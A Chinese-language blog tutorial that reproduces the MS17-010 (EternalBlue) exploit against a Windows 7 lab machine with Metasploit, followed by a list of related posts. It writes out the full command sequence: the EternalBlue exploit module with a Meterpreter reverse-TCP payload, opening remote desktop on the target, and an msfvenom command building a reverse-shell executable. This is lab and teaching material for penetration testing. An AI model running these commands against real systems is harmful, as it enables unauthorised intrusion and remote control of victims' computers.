利用Metasploit控制目标电脑(Win7_x64系统)

最新推荐文章于 2023-04-21 12:16:07 发布
最新推荐文章于 2023-04-21 12:16:07 发布
阅读量2.3k 收藏 9
点赞数 3
分类专栏: Kali 漏洞复现 文章标签: 网络安全 安全漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46700234/article/details/122201660
版权

介绍

      MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。

MS17-010(永恒之蓝)漏洞简介

      永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。

    永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

目录

1. 前提

2. 开启模块

3. 查找漏洞

4. 设置模块

5. 设置参数并开始攻击

6. 攻击成功及反馈

7. 获取靶机权限

8. 附加

1. 前提

   ①kali攻击机与Win7系统在同一局域网的同一网段上;

   ②能相互ping通。

    Kali信息:

    网卡使用VMnet8,通过物理机可知:

    Win7信息:

  测试下网络是否能ping通:

 2. 开启模块

     打开kali,利用msf框架进行渗透,先查看kali数据库是否开启: 

service postgresql status

    下图为没有开启,还可以设置postgresql,开机自启:

update-rc.d postgresql enable

 3. 查找漏洞

    首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启; 

4. 设置模块 

   打开metasploit搜索ms17-010;

  ①进入msfconsole (每次界面随机,不固定)

  ②初始化数据库  msfdb init

  下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。

  关注两个:扫描漏洞    auxiliary/scanner/smb/smb_ms17_010;

                    漏洞利用   exploit/windows/smb/ms17_010_eternalblue;

 5. 设置参数并开始攻击

    选择漏洞验证扫描工具并设置参数;

    ①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块

    ②show options:查看设置

   ③set rhost 靶机ip(192.168.137.140)

   ④exploit 运行

   选择攻击模块并设置参数;

  ①use exploit/windows/smb/ms17_010_eternalblue //选择模块

  ②options //查看详细信息

   ③set payload windows/x64/meterpreter/reverse_tcp //选择荷载

   ④set rhost 靶机ip(Win7:192.168.137.140)

   ⑤set lhost 攻击机ip(kali:192.168.137.134)

 6. 攻击成功及反馈

    exploit //运行攻击

7. 获取靶机权限

   ①run getgui -e // 开启靶机3389端口(远程桌面用)

   ②查看系统信息、提权添加账户以及获取密码等

   输入shell进入目标系统 shell

   chcp 65001 //解决shell后windows终端乱码

   sysconfig  //查看靶机系统信息

附加:

    当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。

    ① 生成一个被控端payload1.exe,再启动Metasploit

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe

  ②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)

  ③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;

  sessions命令可显示所有的会话,以查看目标机的信息。

 下面送上两张常用命令的图片

至此,两种方式对靶机已成功渗透。

希望能帮到大家,如果可以解决大家的小问题,麻烦点赞收藏加关注,若有问题评论区留言或私信我。

安全杂记
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali从入门到银手镯(三):利用Metasploit工具的Win7渗透测试
乐百川
07-13 4235
现在很多用户还在使用Win7系统,虽然我个人也非常喜欢Win7,也承认这是一款非常经典的系统。但是Win7已经在今年1月份彻底停止了支持,也就是说永远也不会得到安全更新和补丁修复了。这对用户来说是极大的危险,如果有条件的话,还是请使用最新版的Win10,并及时更新安全补丁,保护电脑。 今天就来看看如何利用Kali来对Win7进行渗透。这里使用的工具是大名鼎鼎的Metaspoit,集成了大量漏洞渗透工具。其中自然有臭名昭著的永恒之蓝工具,它利用Windows系统的SMB漏洞, 漏洞编号是MS17-010。具
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
喜欢Python编程的程序员柚柚呀
04-22 553
​​MSF Windows提权​​​​反弹shell​​​​提权​​​​END推荐阅读​​​​MSF Linux提权​​​​反弹shell​​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
win7下metasploit-framework安装及使用笔记
QQ317968200的专栏
07-01 8203
1.去官网下载最新版本的metasploit-framework2.下载好后,退出电脑的杀毒软件,因为安装的时候里面好多文件会被当做病毒删除3.点击安装,下一步下一步依次即可4.安装完成后启动,这个启动的地方我找了好久;具体启动的地方到里的安装目录下找到embedded文件夹,找到下面的mingw文件夹里面的mingw32env.cmd,双击启动,然后输入msfconsole回车即可启动5.具体使...
持续控制
wk19951125的博客
05-30 384
持续控制持续控制理解控制持久化通信技术使用XMLHttpRequest轮询使用跨站资源共享使用WebSocket通信 持续控制 通过初始控制,我们进的“大门”,那么如何让“大门”始终为你敞开呢? 理解控制持久化 理想情况下,保持对浏览器的控制不仅意味着断开网络时不失去控制,同时也意味着与用户访问哪个网站不相关。 持久控制可以分两个方面: 持久通信:通过持久的通信渠道,保障对一个或多个浏览器的持续...
metasploit的安装--winows环境
最小公倍数的博客
10-25 8494
1、下载适用于win的.exe文件,双击即可安装; 下载地址:http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe 2、安装步骤 (1)双击.exe文件,进入安装; (2)勾选同意协议; (3)选择安装路径,我是选择在D盘,C盘东西太多; (4)接着出现下面...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统目标系统Windows7 x64虚拟机。
metasploit-lowlevel_metasploit_
10-02
for hackers who want to learn the act of exploitation
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
Metasploit漏洞实例分析_gobai_vulnerability_信息安全_metasploit_
09-30
关于Metasploit漏洞实例分析,学会Metasploit基本介绍与配置
CFW最新XSS漏洞,可远程执行代码控制电脑
kracer的博客
03-01 3081
0x01 简介 1.CFW是什么 使用过机场的朋友应该都听过clash_for_windows,一款便于用户可视化操作和使用的软件。 2月23日,网友@Anthem-whisper通过github Issues向CFW作者提交了可导致远程代码执行的XSS漏洞。由于使用人数多,恶意利用该漏洞可导致被害者电脑植入木马病毒被远程控制,危害巨大。本文章用的是0.19.8版本,做简单的漏洞复现演示其危害,希望大家能赶快更新到最新版本免受被入侵。 2.漏洞产生原因: ...
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2128
使用Metasploit生成木马控制Windows系统
metasploit3.6安装与配置之windows篇
ropin_os的专栏
03-17 8483
      metasploit的强大不需要我多说了,我相信看到这篇文章的人都对它有所了解。3月7号metasploit framework推出了3.6.0版本,抢先体验了下,发现自己竟然不会用了...之前用的3.4版本默认使用的数据库是mysqlite3,连接数据库非常方便,从3.5开始,数据库换成了postgresql,就是这个数据库的配置折腾了我好久,想换成mysql或者sqlite3,发现更困难,于是就和postgresql死磕了几天。现在将我试验成功的解决方案写出来,希望能帮助有需要的人。(下一篇
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1457
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5186
超详细的windows提权姿势汇总
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2302
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
使用MetasploitWindows7进行提权
zhanqinli的博客
04-21 531
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
Metasploit入侵win7
qq_53030229的博客
11-07 1824
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
该漏洞可以使攻击者通过网络获取Windows系统控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之蓝漏洞渗透win10的步骤: 1. 首先,需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值